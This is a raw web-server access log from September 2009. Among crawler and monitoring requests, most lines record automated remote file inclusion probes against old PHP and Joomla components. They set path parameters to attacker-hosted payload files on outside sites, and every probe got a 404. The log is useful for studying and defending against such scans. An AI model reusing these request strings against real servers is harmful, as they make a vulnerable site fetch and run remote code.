209.59.12.99 - - [04/Sep/2009:02:14:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.87 - - [04/Sep/2009:02:15:01 -0400] "GET /images/_notes/nav_upper_bgrd.jpg.mno HTTP/1.0" 200 265 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.120.237.150 - - [04/Sep/2009:02:15:47 -0400] "GET /logs/error_log.Q109080200/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 233 "-" "libwww-perl/5.831"
216.120.237.150 - - [04/Sep/2009:02:15:47 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 207 "-" "libwww-perl/5.831"
216.120.237.150 - - [04/Sep/2009:02:15:47 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 212 "-" "libwww-perl/5.831"
78.47.128.166 - - [04/Sep/2009:02:16:08 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:16:08 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:16:08 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:16:09 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:16:09 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:16:09 -0400] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:16:09 -0400] "GET /logs/error_log.Q109062300//bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
123.125.66.57 - - [04/Sep/2009:02:16:11 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
78.47.128.166 - - [04/Sep/2009:02:16:18 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:16:19 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:16:19 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:16:20 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:16:20 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:16:20 -0400] "GET /logs/error_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:16:21 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.55.179.121 - - [04/Sep/2009:02:17:45 -0400] "GET /logs/access_log.Q109061100/index.php?page=http://kpu.feelmuziq.com/comm/attach/tukulid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.55.179.121 - - [04/Sep/2009:02:17:45 -0400] "GET /logs/index.php?page=http://kpu.feelmuziq.com/comm/attach/tukulid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.55.179.121 - - [04/Sep/2009:02:17:45 -0400] "GET /index.php?page=http://kpu.feelmuziq.com/comm/attach/tukulid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
72.55.179.121 - - [04/Sep/2009:02:17:54 -0400] "GET /logs/access_log.Q109061100/index.php?page=http://kpu.feelmuziq.com/comm/attach/tukulid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
72.55.179.121 - - [04/Sep/2009:02:17:54 -0400] "GET /logs/index.php?page=http://kpu.feelmuziq.com/comm/attach/tukulid.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
72.55.179.121 - - [04/Sep/2009:02:17:54 -0400] "GET /index.php?page=http://kpu.feelmuziq.com/comm/attach/tukulid.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.55.105.234 - - [04/Sep/2009:02:18:24 -0400] "GET /logs/access_log.Q109070100 HTTP/1.1" 200 4008187 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
220.181.7.131 - - [04/Sep/2009:02:19:18 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [04/Sep/2009:02:19:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.200.89.25 - - [04/Sep/2009:02:22:47 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
74.200.89.25 - - [04/Sep/2009:02:22:47 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:22:49 -0400] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:22:49 -0400] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:22:49 -0400] "GET /logs/access_log.Q109060300/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:22:49 -0400] "GET /logs/access_log.Q109071000/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:22:50 -0400] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:22:50 -0400] "GET /logs/access_log.Q109080800%20%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:22:50 -0400] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:22:50 -0400] "GET /logs/access_log.Q109071000%20%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:22:54 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:22:54 -0400] "GET /phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:22:54 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:22:57 -0400] "GET /phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:22:57 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:22:57 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:23:00 -0400] "GET /logs/error_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:23:01 -0400] "GET /logs/error_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:23:24 -0400] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:23:24 -0400] "GET /logs/access_log.Q109061000/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:23:24 -0400] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:23:31 -0400] "GET /logs/access_log.Q109061800/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
144.41.3.21 - - [04/Sep/2009:02:24:06 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)"
144.41.3.21 - - [04/Sep/2009:02:24:06 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)"
144.41.3.21 - - [04/Sep/2009:02:24:07 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)"
144.41.3.21 - - [04/Sep/2009:02:24:07 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)"
209.59.12.99 - - [04/Sep/2009:02:24:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.38.136.251 - - [04/Sep/2009:02:25:12 -0400] "GET /phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:02:25:12 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:02:25:13 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:02:25:13 -0400] "GET /logs/error_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.31 - - [04/Sep/2009:02:25:25 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
77.221.130.31 - - [04/Sep/2009:02:25:25 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
77.221.130.31 - - [04/Sep/2009:02:25:25 -0400] "GET /logs/access_log.Q109051700/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:25:53 -0400] "GET /logs/access_log.Q109080800/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:25:53 -0400] "GET /logs/access_log.Q109071000/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:02:25:59 -0400] "GET /phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:02:25:59 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:02:25:59 -0400] "GET /logs/error_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:02:25:59 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.94.125.100 - - [04/Sep/2009:02:26:02 -0400] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mywebbguy.com/plugins/system/fx29id.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.94.125.100 - - [04/Sep/2009:02:26:02 -0400] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mywebbguy.com/plugins/system/fx29id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.31 - - [04/Sep/2009:02:26:03 -0400] "GET /logs/access_log.Q109051500/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:26:06 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:26:06 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:26:06 -0400] "GET /logs/error_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:26:07 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:26:07 -0400] "GET /logs/error_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:26:07 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:02:26:18 -0400] "GET /logs/access_log.Q109061700//modules/My_eGallery/errors.php?error=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
80.73.192.55 - - [04/Sep/2009:02:26:31 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.73.192.55 - - [04/Sep/2009:02:26:32 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:27:02 -0400] "GET /logs/access_log.Q109061000%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
78.111.80.234 - - [04/Sep/2009:02:27:02 -0400] "GET /logs/access_log.Q109061800%20%20/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.b92.net/system/files/id1.txt???%20? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
67.218.116.164 - - [04/Sep/2009:02:27:42 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.132 - - [04/Sep/2009:02:28:52 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [04/Sep/2009:02:29:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.31 - - [04/Sep/2009:02:30:07 -0400] "GET /logs/access_log.Q109051700%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:30:09 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:30:11 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:30:11 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:30:15 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:30:15 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:30:15 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:30:21 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
77.221.130.31 - - [04/Sep/2009:02:30:24 -0400] "GET /logs/access_log.Q109051500%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:02:30:26 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
66.249.71.16 - - [04/Sep/2009:02:31:31 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.16 - - [04/Sep/2009:02:31:31 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L110A544309279300F58502W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.194.10.126 - - [04/Sep/2009:02:31:38 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.194.10.126 - - [04/Sep/2009:02:31:38 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.249.71.16 - - [04/Sep/2009:02:31:41 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L110A544309C7C300FD8502W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.201 - - [04/Sep/2009:02:31:50 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L110A54430977F300FD8502W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.201 - - [04/Sep/2009:02:32:01 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L110A544309573300F78502W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.218.40.180 - - [04/Sep/2009:02:32:10 -0400] "GET /mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:02:32:10 -0400] "GET /logs/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:02:32:10 -0400] "GET /logs/access_log.Q109080800/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:02:32:10 -0400] "GET /logs/access_log.Q109071000/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.194.10.126 - - [04/Sep/2009:02:32:10 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.71.201 - - [04/Sep/2009:02:32:11 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L110A544309079300F48502W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.218.40.180 - - [04/Sep/2009:02:32:50 -0400] "GET /mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:02:32:50 -0400] "GET /logs/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:02:32:50 -0400] "GET /logs/access_log.Q109080800%20%20/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.218.40.180 - - [04/Sep/2009:02:32:52 -0400] "GET /logs/access_log.Q109072100%20%20/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.39.5.203 - - [04/Sep/2009:02:33:36 -0400] "GET /logs/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
195.39.5.203 - - [04/Sep/2009:02:33:38 -0400] "GET /logs/access_log.Q109071000/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.39.5.203 - - [04/Sep/2009:02:33:38 -0400] "GET /mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
195.39.5.203 - - [04/Sep/2009:02:33:38 -0400] "GET /mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
195.39.5.203 - - [04/Sep/2009:02:33:38 -0400] "GET /logs/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
195.39.5.203 - - [04/Sep/2009:02:33:39 -0400] "GET /logs/access_log.Q109080800/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
